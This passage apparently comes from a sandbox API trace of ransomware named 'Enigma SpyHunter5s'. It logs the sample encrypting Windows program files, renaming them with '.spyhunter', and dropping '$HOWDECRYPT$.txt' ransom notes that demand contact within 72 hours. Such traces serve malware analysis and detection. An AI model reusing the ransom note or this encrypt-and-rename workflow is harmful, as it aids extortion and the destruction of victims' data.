(lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.356] WriteFile (in: hFile=0x178, lpBuffer=0x57fb07*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fc30, lpOverlapped=0x0 | out: lpBuffer=0x57fb07*, lpNumberOfBytesWritten=0x57fc30*=0x127, lpOverlapped=0x0) returned 1 [0093.357] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.357] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fc30, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fc30*=0x2ac, lpOverlapped=0x0) returned 1 [0093.357] CloseHandle (hObject=0x178) returned 1 [0093.357] GetProcessHeap () returned 0x2c0000 [0093.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e9c8 | out: hHeap=0x2c0000) returned 1 [0093.358] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbd0 | out: pbBuffer=0x57fbd0) returned 1 [0093.358] GetProcessHeap () returned 0x2c0000 [0093.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.358] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbc8*=0x30) returned 1 [0093.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0093.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS") returned 77 [0093.358] StrStrW (lpFirst="MSB1FRAR.ITS", lpSrch=".txt") returned 0x0 [0093.358] GetProcessHeap () returned 0x2c0000 [0093.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0093.358] ReadFile (in: hFile=0x178, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x57fb8c*=0x2800, lpOverlapped=0x0) returned 1 [0093.384] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.384] WriteFile (in: hFile=0x178, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x57fb8c*=0x2800, lpOverlapped=0x0) returned 1 [0093.384] GetProcessHeap () returned 0x2c0000 [0093.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0093.384] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.384] WriteFile (in: hFile=0x178, lpBuffer=0x57fbcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb8c, lpOverlapped=0x0 | out: lpBuffer=0x57fbcc*, lpNumberOfBytesWritten=0x57fb8c*=0x4, lpOverlapped=0x0) returned 1 [0093.386] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb8c*=0x30, lpOverlapped=0x0) returned 1 [0093.386] CloseHandle (hObject=0x178) returned 1 [0093.807] GetProcessHeap () returned 0x2c0000 [0093.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0093.807] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.spyhunter") returned 87 [0093.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its.spyhunter")) returned 1 [0093.808] GetProcessHeap () returned 0x2c0000 [0093.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.808] GetProcessHeap () returned 0x2c0000 [0093.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.808] GetProcessHeap () returned 0x2c0000 [0093.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377a80 | out: hHeap=0x2c0000) returned 1 [0093.808] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbc8 | out: pbBuffer=0x57fbc8) returned 1 [0093.808] GetProcessHeap () returned 0x2c0000 [0093.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.808] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbc0*=0x30) returned 1 [0093.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0093.808] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX") returned 75 [0093.809] StrStrW (lpFirst="WT61ES.LEX", lpSrch=".txt") returned 0x0 [0093.809] GetProcessHeap () returned 0x2c0000 [0093.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0093.809] ReadFile (in: hFile=0x178, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb84, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x57fb84*=0x2800, lpOverlapped=0x0) returned 1 [0093.859] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.859] WriteFile (in: hFile=0x178, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb84, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x57fb84*=0x2800, lpOverlapped=0x0) returned 1 [0093.860] GetProcessHeap () returned 0x2c0000 [0093.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.860] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.860] WriteFile (in: hFile=0x178, lpBuffer=0x57fbc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb84, lpOverlapped=0x0 | out: lpBuffer=0x57fbc4*, lpNumberOfBytesWritten=0x57fb84*=0x4, lpOverlapped=0x0) returned 1 [0095.880] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb84, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb84*=0x30, lpOverlapped=0x0) returned 1 [0095.880] CloseHandle (hObject=0x178) returned 1 [0096.340] GetProcessHeap () returned 0x2c0000 [0096.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0096.340] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX.spyhunter") returned 85 [0096.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex.spyhunter")) returned 1 [0096.341] GetProcessHeap () returned 0x2c0000 [0096.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.341] GetProcessHeap () returned 0x2c0000 [0096.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0096.341] GetProcessHeap () returned 0x2c0000 [0096.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3463a8 | out: hHeap=0x2c0000) returned 1 [0096.341] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0096.487] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0096.487] WriteFile (in: hFile=0x178, lpBuffer=0x57fafb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fc24, lpOverlapped=0x0 | out: lpBuffer=0x57fafb*, lpNumberOfBytesWritten=0x57fc24*=0x127, lpOverlapped=0x0) returned 1 [0096.488] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0096.488] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fc24, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fc24*=0x2ac, lpOverlapped=0x0) returned 1 [0096.488] CloseHandle (hObject=0x178) returned 1 [0096.488] GetProcessHeap () returned 0x2c0000 [0096.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358060 | out: hHeap=0x2c0000) returned 1 [0096.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft analysis services\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0096.489] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0096.489] WriteFile (in: hFile=0x178, lpBuffer=0x57faf7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fc20, lpOverlapped=0x0 | out: lpBuffer=0x57faf7*, lpNumberOfBytesWritten=0x57fc20*=0x127, lpOverlapped=0x0) returned 1 [0096.489] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0096.489] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fc20, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fc20*=0x2ac, lpOverlapped=0x0) returned 1 [0096.490] CloseHandle (hObject=0x178) returned 1 [0096.490] GetProcessHeap () returned 0x2c0000 [0096.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0096.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0096.490] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0096.490] WriteFile (in: hFile=0x178, lpBuffer=0x57faf3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fc1c, lpOverlapped=0x0 | out: lpBuffer=0x57faf3*, lpNumberOfBytesWritten=0x57fc1c*=0x127, lpOverlapped=0x0) returned 1 [0096.491] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0096.491] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fc1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fc1c*=0x2ac, lpOverlapped=0x0) returned 1 [0096.491] CloseHandle (hObject=0x178) returned 1 [0096.491] GetProcessHeap () returned 0x2c0000 [0096.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0096.491] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0096.493] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0096.493] WriteFile (in: hFile=0x178, lpBuffer=0x57faef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fc18, lpOverlapped=0x0 | out: lpBuffer=0x57faef*, lpNumberOfBytesWritten=0x57fc18*=0x127, lpOverlapped=0x0) returned 1 [0096.494] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0096.494] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fc18, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fc18*=0x2ac, lpOverlapped=0x0) returned 1 [0096.494] CloseHandle (hObject=0x178) returned 1 [0096.494] GetProcessHeap () returned 0x2c0000 [0096.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377998 | out: hHeap=0x2c0000) returned 1 [0096.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0096.505] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0096.505] WriteFile (in: hFile=0x16c, lpBuffer=0x57faeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fc14, lpOverlapped=0x0 | out: lpBuffer=0x57faeb*, lpNumberOfBytesWritten=0x57fc14*=0x127, lpOverlapped=0x0) returned 1 [0096.506] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0096.506] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fc14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fc14*=0x2ac, lpOverlapped=0x0) returned 1 [0096.506] CloseHandle (hObject=0x16c) returned 1 [0096.507] GetProcessHeap () returned 0x2c0000 [0096.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381a90 | out: hHeap=0x2c0000) returned 1 [0096.507] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbb0 | out: pbBuffer=0x57fbb0) returned 1 [0096.507] GetProcessHeap () returned 0x2c0000 [0096.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0096.507] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fba8*=0x30) returned 1 [0096.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0096.522] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll") returned 74 [0096.522] StrStrW (lpFirst="msolap100.dll", lpSrch=".txt") returned 0x0 [0096.522] GetProcessHeap () returned 0x2c0000 [0096.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c150d8 [0096.522] ReadFile (in: hFile=0x170, lpBuffer=0x2c150d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c150d8*, lpNumberOfBytesRead=0x57fb6c*=0x2800, lpOverlapped=0x0) returned 1 [0096.534] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.534] WriteFile (in: hFile=0x170, lpBuffer=0x2c150d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c150d8*, lpNumberOfBytesWritten=0x57fb6c*=0x2800, lpOverlapped=0x0) returned 1 [0096.534] GetProcessHeap () returned 0x2c0000 [0096.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c150d8 | out: hHeap=0x2c0000) returned 1 [0096.534] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.534] WriteFile (in: hFile=0x170, lpBuffer=0x57fbac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb6c, lpOverlapped=0x0 | out: lpBuffer=0x57fbac*, lpNumberOfBytesWritten=0x57fb6c*=0x4, lpOverlapped=0x0) returned 1 [0096.553] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb6c*=0x30, lpOverlapped=0x0) returned 1 [0096.553] CloseHandle (hObject=0x170) returned 1 [0096.553] GetProcessHeap () returned 0x2c0000 [0096.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 